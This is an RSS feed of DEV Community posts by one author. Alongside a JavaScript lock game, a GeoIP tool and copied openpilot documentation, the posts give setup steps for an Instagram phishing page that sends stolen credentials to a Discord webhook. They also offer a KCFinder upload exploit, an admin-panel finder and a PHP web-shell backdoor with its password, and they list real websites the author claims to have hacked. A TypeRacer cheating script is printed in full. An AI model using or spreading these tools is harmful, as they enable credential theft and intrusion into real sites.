<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Kaixin</title>
    <description>The latest articles on DEV Community by Kaixin (@penucuricode).</description>
    <link>https://dev.to/penucuricode</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F626619%2Ff69ca29f-a0b3-4545-96f1-368a31c0e74f.PNG</url>
      <title>DEV Community: Kaixin</title>
      <link>https://dev.to/penucuricode</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/penucuricode"/>
    <language>en</language>
    <item>
      <title>Break Lock Challenge Game In JavaScript</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Thu, 13 Jan 2022 09:53:17 +0000</pubDate>
      <link>https://dev.to/kaixinn/break-lock-challenge-game-in-javascript-2bb4</link>
      <guid>https://dev.to/kaixinn/break-lock-challenge-game-in-javascript-2bb4</guid>
      <description>&lt;p&gt;Project: Break Lock Challenge Game in JavaScript&lt;br&gt;
&lt;a href="https://github.com/GarudaID/Breaking-Lock"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Break lock challenge is a javascript project. The objective of this game is to break the lock by drawing the pattern. The starter guide is available in the project. This game is made in JavaScript and HTML5. When you try to draw mobile lock pattern if it matches then it opens but closes for sudden if it fails. This project is similar to that concept.&lt;/p&gt;

&lt;p&gt;About The Project&lt;br&gt;
Talking about the project, this project uses simple logic when it comes to the pattern drawing and locking the phone. To run the project you will need a browser. Use Google Chrome for a better experience. When you run the game you will see the home page with some hints about the gameplay. You can select the mode you want to play to unlock the pattern. Practice, Challenge and Countdown mode are available in the project.&lt;/p&gt;

&lt;p&gt;You can use the practice mode for preparing yourself for the real game challenge. Select the challenge mode if you want to really to give a challenge. You will get a total of ten attempts during the gameplay. With each wrong pattern is drawn in the game will lead you to the deduction in the moves.&lt;/p&gt;

</description>
      <category>javascript</category>
      <category>html</category>
    </item>
    <item>
      <title>Instagram Phising</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Fri, 31 Dec 2021 06:30:26 +0000</pubDate>
      <link>https://dev.to/kaixinn/instagram-phising-49gk</link>
      <guid>https://dev.to/kaixinn/instagram-phising-49gk</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--O8js6pQz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f3i0qqjsu6njoercfqzu.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--O8js6pQz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f3i0qqjsu6njoercfqzu.PNG" alt="Image description" width="517" height="519"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Instagram Phishing Usage :&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Note : Don't forgot I don't give a fuck about what you do with my code, I am obviously not responsable of shit you do ok ? 😉&lt;/li&gt;
&lt;li&gt;My Instagram phishing page is really easy to use, you only have to replace WEBHOOK on line 101 by your Discord webhook. 
&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--UW_X03Yl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3mh7ps5m5kta892jwm08.png" alt="Image description" width="555" height="17"&gt;
&lt;/li&gt;
&lt;li&gt;Next you upload it in your website (like netlify or 000webhost, they are free)&lt;/li&gt;
&lt;li&gt;&lt;p&gt;When someone will login you will receive his credentials and he will be redirected to a funny video (the one in the link, you can change it by editing the link and the js part in HTML on line 108). &lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--0u8RY_-A--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5gt924f7gqi4qhe6p6t6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--0u8RY_-A--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5gt924f7gqi4qhe6p6t6.png" alt="Image description" width="321" height="19"&gt;&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Github Repo: &lt;a href="https://github.com/GarudaID/ig-phising"&gt;PenucuriCode&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>javascript</category>
      <category>programming</category>
    </item>
    <item>
      <title>GeoIP NodeJS</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Thu, 30 Dec 2021 13:42:19 +0000</pubDate>
      <link>https://dev.to/kaixinn/geoip-nodejs-5dmn</link>
      <guid>https://dev.to/kaixinn/geoip-nodejs-5dmn</guid>
      <description>&lt;p&gt;Basic GeoIP coded on NodeJS for educational purposes.&lt;br&gt;
Tool coded on nodejs that grabs info about an IP Address.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Github Repo: &lt;a href="https://github.com/GarudaID/GeoIP-NodeJS"&gt;PenucuriCode&lt;/a&gt;
&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--4P1yTmOm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1sr2a9zn8wljeljx6hty.PNG" alt="Image description" width="453" height="325"&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Install and Usage
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;npm install
node index.js
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Used Package
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.npmjs.com/package/node-iplocate"&gt;Node IPLocate&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Contributing
&lt;/h2&gt;

&lt;p&gt;Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.&lt;/p&gt;

&lt;p&gt;Please make sure to update tests as appropriate.&lt;/p&gt;

</description>
      <category>programming</category>
      <category>javascript</category>
      <category>node</category>
    </item>
    <item>
      <title>TypeRacer Hack Code</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Sun, 26 Dec 2021 13:07:24 +0000</pubDate>
      <link>https://dev.to/kaixinn/typeracer-hack-code-5dmo</link>
      <guid>https://dev.to/kaixinn/typeracer-hack-code-5dmo</guid>
      <description>&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;var counter = -1;
var firstWord = document.getElementsByClassName("inputPanel")[0].querySelectorAll("span")[0].innerHTML + document.getElementsByClassName("inputPanel")[0].querySelectorAll("span")[1].innerHTML,
restOfText = document.getElementsByClassName("inputPanel")[0].querySelectorAll("span")[2].innerHTML;
var fullText = firstWord.concat(restOfText);
var inputBox = document.getElementsByClassName('txtInput');
(function getString() {
    setTimeout(function() {
        counter++;
        inputBox[0].value += fullText[counter];
        if(counter != fullText.length) {
            getString();
        }
        //adjust the 100 milliseconds for a faster wpm &amp;amp; be undetected by their new system.
    }, 100);
})()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Copy the code above ^^ then go to TypeRacer Enter a Race, on your keyboard press ctrl + shift + i to open the console When the game starts(It says GO!), paste the cheat code you just copied in the console and hit enter&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://play.typeracer.com/?universe=lang_id"&gt;TypeRacer&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qoMoe9oV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yjq627wxm5y506pahr8f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qoMoe9oV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yjq627wxm5y506pahr8f.png" alt="Image description" width="880" height="601"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Uh7UUef1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/04taxm58n1naadkb4h1a.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Uh7UUef1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/04taxm58n1naadkb4h1a.PNG" alt="Image description" width="657" height="460"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>javascript</category>
      <category>programming</category>
      <category>html</category>
    </item>
    <item>
      <title>Hacking Upload Methode KCFINDER</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Sun, 26 Dec 2021 08:49:24 +0000</pubDate>
      <link>https://dev.to/kaixinn/hacking-upload-methode-kcfinder-3n4d</link>
      <guid>https://dev.to/kaixinn/hacking-upload-methode-kcfinder-3n4d</guid>
      <description>&lt;p&gt;This script is recode from Meow404 project. &lt;br&gt;
use it well.&lt;br&gt;
Written by: Meow404-Unknown45 &lt;br&gt;
My Partner by: CyberArmy&lt;/p&gt;

&lt;p&gt;If you like this post please &lt;strong&gt;Hearth - Unicorn - Save&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Github Repo: &lt;a href="https://github.com/SourCode-Z/KCFINDER"&gt;KCFINDER&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--_-d1xz3c--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4cjfct9wk2745jb8jm2a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--_-d1xz3c--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4cjfct9wk2745jb8jm2a.png" alt="Image description" width="880" height="438"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--0LCOzQfy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lv5qgjww0v7z1olpvogt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--0LCOzQfy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lv5qgjww0v7z1olpvogt.png" alt="Image description" width="565" height="150"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PREREQUISITES&lt;/strong&gt;&lt;br&gt;
Python 3.x&lt;br&gt;
pip3&lt;br&gt;
git&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PYTHON 3 PREREQUISITES&lt;/strong&gt;&lt;br&gt;
aiohttp&lt;br&gt;
asyncio&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Installation&lt;/strong&gt;&lt;br&gt;
$ git clone &lt;a href="https://github.com/SourCode-Z/KCFINDER"&gt;https://github.com/SourCode-Z/KCFINDER&lt;/a&gt;&lt;br&gt;
$ cd kcfinder&lt;br&gt;
$ pip3 install -r requirements.txt&lt;br&gt;
$ python exploit.py&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Update Wordlist&lt;/strong&gt;&lt;br&gt;
$ apt install wget&lt;br&gt;
$ python update.py&lt;/p&gt;

&lt;p&gt;Note&lt;br&gt;
Error 403 = Firewall in Website&lt;br&gt;
Error 500 = Server not Responding / Connection Error&lt;/p&gt;

</description>
      <category>javascript</category>
      <category>programming</category>
      <category>python</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Hacking to FindLogin website</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Sun, 26 Dec 2021 08:44:34 +0000</pubDate>
      <link>https://dev.to/kaixinn/easy-to-findlogin-website-4n75</link>
      <guid>https://dev.to/kaixinn/easy-to-findlogin-website-4n75</guid>
      <description>&lt;p&gt;This exploit serves to find a login gap from the system administrator to enter the dashboard page.&lt;br&gt;&lt;br&gt;
This attack will usually work on websites that have the kcfinder extension.&lt;/p&gt;

&lt;p&gt;This script was made by myself without the intervention of others.!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--MJelgOaG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/paq7fseaky38ehhp8423.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--MJelgOaG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/paq7fseaky38ehhp8423.png" alt="Image description" width="514" height="692"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Find Login feature&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Fast search&lt;/li&gt;
&lt;li&gt;Much wordlist&lt;/li&gt;
&lt;li&gt;Good connection&lt;/li&gt;
&lt;li&gt;Support for termux&lt;/li&gt;
&lt;li&gt;Coming soon for another os&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;[ Installation ]&lt;/strong&gt;&lt;br&gt;
$ apt update upgrade&lt;br&gt;
$ apt install python3 git&lt;br&gt;
$ git clone &lt;a href="https://github.com/SourCode-Z/Findlogin-v.1.5-meowproject-"&gt;https://github.com/SourCode-Z/Findlogin-v.1.5-meowproject-&lt;/a&gt;&lt;br&gt;
$ cd findlogin&lt;br&gt;
$ pip install -r requirement.txt&lt;br&gt;
$ pip install asyncio aiohttp time socket request&lt;br&gt;
$ python adfind.py&lt;/p&gt;

</description>
      <category>javascript</category>
      <category>webdev</category>
      <category>programming</category>
      <category>html</category>
    </item>
    <item>
      <title>Shell-Backdoor for Hacking</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Sun, 26 Dec 2021 08:41:44 +0000</pubDate>
      <link>https://dev.to/kaixinn/shell-backdoor-14ln</link>
      <guid>https://dev.to/kaixinn/shell-backdoor-14ln</guid>
      <description>&lt;p&gt;I made this script to help make it easier for you to directly attack index.html / index.php / phpmyadmin on the website&lt;br&gt;
for the advantages of this script feature I have completed everything. You can check the features below&lt;br&gt;
I'm optimizing updates as soon as possible, for a better experience. 😄&lt;br&gt;
if you are interested, please share and include the source to appreciate us who have made this shell-backdoor. 😄&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Github Repo: &lt;a href="https://github.com/SourCode-Z/Shell-Backdoor"&gt;Shell Backdoor&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Website has been hacked by PenucuriCode&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://clinicadelacostera.com/"&gt;Clinicadelacostera.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://ftp.mashew.com/"&gt;Mashew.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.rednoses.de/"&gt;Rednoses.de&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.loogistico.com/assets/upload_files/readme.html"&gt;Loogistico.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://138.68.183.167/"&gt;138.68.183.167&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://207.246.87.249/"&gt;207.246.87.249&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://66.42.99.19/"&gt;66.42.99.19&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://35.154.178.25/"&gt;35.154.178.25&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Password shell-backdoor&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;username : meow404&lt;/li&gt;
&lt;li&gt; password : penucuriCode&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8gAgJIlb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/w3psjnodw45wt8jvp312.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8gAgJIlb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/w3psjnodw45wt8jvp312.png" alt="Image description" width="729" height="623"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--nvy-d1y0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aw2wvuybu2nr12y3bra8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--nvy-d1y0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aw2wvuybu2nr12y3bra8.png" alt="Image description" width="698" height="632"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>programming</category>
      <category>php</category>
      <category>javascript</category>
    </item>
    <item>
      <title>Encode - Decode</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Sun, 26 Dec 2021 08:37:43 +0000</pubDate>
      <link>https://dev.to/kaixinn/encode-decode-3ddp</link>
      <guid>https://dev.to/kaixinn/encode-decode-3ddp</guid>
      <description>&lt;p&gt;In computers, encoding is the process of putting a sequence of characters&lt;br&gt;
(letters, numbers, punctuation, and certain symbols)&lt;br&gt;
into a specialized format for efficient transmission or storage.&lt;br&gt;
Decoding is the opposite process --&lt;br&gt;
the conversion of an encoded format back into the original sequence of characters.&lt;/p&gt;

&lt;p&gt;This script was made by myself without the intervention of others.!&lt;/p&gt;

&lt;p&gt;Github Repo: &lt;a href="https://github.com/SourCode-Z/Encode-Decode"&gt;Encode - Decode&lt;/a&gt;&lt;/p&gt;

</description>
      <category>javascript</category>
      <category>webdev</category>
      <category>programming</category>
      <category>html</category>
    </item>
    <item>
      <title>HTML-Encrypted</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Sun, 26 Dec 2021 08:33:36 +0000</pubDate>
      <link>https://dev.to/kaixinn/html-encrypted-2203</link>
      <guid>https://dev.to/kaixinn/html-encrypted-2203</guid>
      <description>&lt;p&gt;Protect your HTML-code by using encryption.&lt;br&gt;
Your website will be shown as normal but the HTML-code will be encrypted by Javascript.&lt;/p&gt;

&lt;p&gt;This script was made by myself without the intervention of others.!&lt;br&gt;
Protect your HTML-code by using encryption. Your website will be shown as normal but the HTML-code will be encrypted by Javascript.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Link HTML encrypted: &lt;a href="https://sourcode-z.github.io/HTML-Encrypted/"&gt;encrypted your Code&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Showcase&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--YaOLLpNJ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/632fjoxefau50981n170.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--YaOLLpNJ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/632fjoxefau50981n170.jpg" alt="Image description" width="880" height="324"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;if u wat use my HTML Encrypt for ur page please add Credit&lt;/p&gt;

</description>
      <category>javascript</category>
      <category>programming</category>
      <category>html</category>
    </item>
    <item>
      <title>Login bot Discord with Webhook</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Sun, 26 Dec 2021 08:11:23 +0000</pubDate>
      <link>https://dev.to/penucuricode/login-bot-discord-with-webhook-2050</link>
      <guid>https://dev.to/penucuricode/login-bot-discord-with-webhook-2050</guid>
      <description>&lt;p&gt;These are most of the examples of BOT Login with Webhook method.&lt;br&gt;
and very easy to use, does not require a TOKEN&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Invite my Bot: &lt;a href="https://discord.com/oauth2/authorize?client_id=904032472755499099&amp;amp;permissions=327558298918&amp;amp;scope=bot"&gt;Kaixin Music&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Link Webhook: &lt;a href="http://bot.zone-id.my.id/"&gt;Login Bot With Webhook&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Follow Github: &lt;a href="https://github.com/GarudaID"&gt;penucuriCode&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Send Message to Channel&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Gd0Gf-jv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zlq73k78vjmebgl065ds.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Gd0Gf-jv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zlq73k78vjmebgl065ds.PNG" alt="Image description" width="880" height="609"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;After Send Message&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ql_Ci-Zu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/12y0esj8p0hyrjqtlwzs.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ql_Ci-Zu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/12y0esj8p0hyrjqtlwzs.PNG" alt="Image description" width="389" height="79"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;if you like this post, please press &lt;strong&gt;Heart - Unicorn - Save&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>javascript</category>
      <category>webdev</category>
      <category>programming</category>
    </item>
    <item>
      <title>OpenPilot</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Sun, 09 May 2021 08:06:28 +0000</pubDate>
      <link>https://dev.to/penucuricode/openpilot-27eg</link>
      <guid>https://dev.to/penucuricode/openpilot-27eg</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--UqQPoS0B--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l217ily8u2hz5ap5qavz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--UqQPoS0B--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l217ily8u2hz5ap5qavz.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;What is openpilot?&lt;br&gt;
openpilot is an open source driver assistance system. Currently, openpilot performs the functions of Adaptive Cruise Control (ACC), Automated Lane Centering (ALC), Forward Collision Warning (FCW) and Lane Departure Warning (LDW) for a growing variety of supported car makes, models and model years. In addition, while openpilot is engaged, a camera based Driver Monitoring (DM) feature alerts distracted and asleep drivers.&lt;/p&gt;

&lt;p&gt;Integration with Stock Features&lt;br&gt;
In all supported cars:&lt;/p&gt;

&lt;p&gt;Stock Lane Keep Assist (LKA) and stock ALC are replaced by openpilot ALC, which only functions when openpilot is engaged by the user.&lt;br&gt;
Stock LDW is replaced by openpilot LDW.&lt;br&gt;
Additionally, on specific supported cars (see ACC column in supported cars):&lt;/p&gt;

&lt;p&gt;Stock ACC is replaced by openpilot ACC.&lt;br&gt;
openpilot FCW operates in addition to stock FCW.&lt;br&gt;
openpilot should preserve all other vehicle's stock features, including, but are not limited to: FCW, Automatic Emergency Braking (AEB), auto high-beam, blind spot warning, and side collision warning.&lt;/p&gt;

&lt;p&gt;Supported Hardware&lt;br&gt;
At the moment, openpilot supports the EON DevKit and the comma two. A car harness is recommended to connect the EON or comma two to the car. For experimental purposes, openpilot can also run on an Ubuntu computer with external webcams.&lt;/p&gt;

&lt;p&gt;Supported Cars:&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ek47ble0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nnm9ompxuomkmks96p16.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ek47ble0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nnm9ompxuomkmks96p16.PNG" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;1Comma Pedal is used to provide stop-and-go capability to some of the openpilot-supported cars that don't currently support stop-and-go. NOTE: The Comma Pedal is not officially supported by comma.&lt;br&gt;
22019 Honda Civic 1.6L Diesel Sedan does not have ALC below 12mph.&lt;br&gt;
3When disconnecting the Driver Support Unit (DSU), openpilot ACC will replace stock ACC. NOTE: disconnecting the DSU disables Automatic Emergency Braking (AEB).&lt;br&gt;
428mph for Camry 4CYL L, 4CYL LE and 4CYL SE which don't have Full-Speed Range Dynamic Radar Cruise Control.&lt;/p&gt;

&lt;p&gt;Community Maintained Cars and Features&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qHKA56vi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1dc5f0uxdapr9wdbz8lv.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qHKA56vi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1dc5f0uxdapr9wdbz8lv.PNG" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;1Requires an OBD-II car harness and community built ASCM harness. NOTE: disconnecting the ASCM disables Automatic Emergency Braking (AEB).&lt;br&gt;
2Only includes the MQB Passat sold outside of North America. The NMS Passat made in Chattanooga TN is not yet supported.&lt;/p&gt;

&lt;p&gt;Community Maintained Cars and Features are not verified by comma to meet our safety model. Be extra cautious using them. They are only available after enabling the toggle in Settings-&amp;gt;Developer-&amp;gt;Enable Community Features.&lt;/p&gt;

&lt;p&gt;To promote a car from community maintained, it must meet a few requirements. We must own one from the brand, we must sell the harness for it, has full ISO26262 in both panda and openpilot, there must be a path forward for longitudinal control, it must have AEB still enabled, and it must support fingerprinting 2.0&lt;/p&gt;

&lt;p&gt;Although they're not upstream, the community has openpilot running on other makes and models. See the 'Community Supported Models' section of each make on our wiki.&lt;/p&gt;

&lt;p&gt;Installation Instructions&lt;br&gt;
Install openpilot on an EON or comma two by entering &lt;a href="https://openpilot.comma.ai"&gt;https://openpilot.comma.ai&lt;/a&gt; during the installer setup.&lt;/p&gt;

&lt;p&gt;Follow these video instructions: &lt;a href="https://www.youtube.com/watch?v=lcjqxCymins"&gt;https://www.youtube.com/watch?v=lcjqxCymins&lt;/a&gt; , to properly mount the device on the windshield. Note: openpilot features an automatic pose calibration routine and openpilot performance should not be affected by small pitch and yaw misalignments caused by imprecise device mounting.&lt;/p&gt;

&lt;p&gt;Before placing the device on your windshield, check the state and local laws and ordinances where you drive. Some state laws prohibit or restrict the placement of objects on the windshield of a motor vehicle.&lt;/p&gt;

&lt;p&gt;You will be able to engage openpilot after reviewing the onboarding screens and finishing the calibration procedure.&lt;/p&gt;

&lt;p&gt;Limitations of openpilot ALC and LDW&lt;br&gt;
